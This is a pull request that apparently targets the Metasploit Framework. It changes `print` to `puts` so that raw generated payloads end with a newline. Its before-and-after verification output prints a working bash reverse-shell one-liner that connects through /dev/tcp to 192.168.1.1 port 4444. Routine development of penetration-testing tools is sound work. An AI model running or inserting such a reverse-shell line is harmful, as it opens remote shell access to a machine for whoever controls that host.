### PR TITLE
enhancement print payload generate raw

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -170,7 +170,7 @@ module Msf
 
             if !ofile
               # Display generated payload
-              print(buf)
+              puts(buf)
             else
               print_status("Writing #{buf.length} bytes to #{ofile}...")
               fd = File.open(ofile, "wb")


### PR DESCRIPTION
Pretty print `generate -f raw` 
`puts "payload\n"` and `puts "payload"` print are the same

## Verification
#### before
```ruby
msf5 payload(cmd/unix/reverse_bash) > generate -f raw
0<&105-;exec 105<>/dev/tcp/192.168.1.1/4444;sh <&105 >&105 2>&105msf5 payload(cmd/unix/reverse_bash) >
```
#### changed
```ruby
msf5 payload(cmd/unix/reverse_bash) > generate -f raw
0<&105-;exec 105<>/dev/tcp/192.168.1.1/4444;sh <&105 >&105 2>&105
msf5 payload(cmd/unix/reverse_bash) >
```
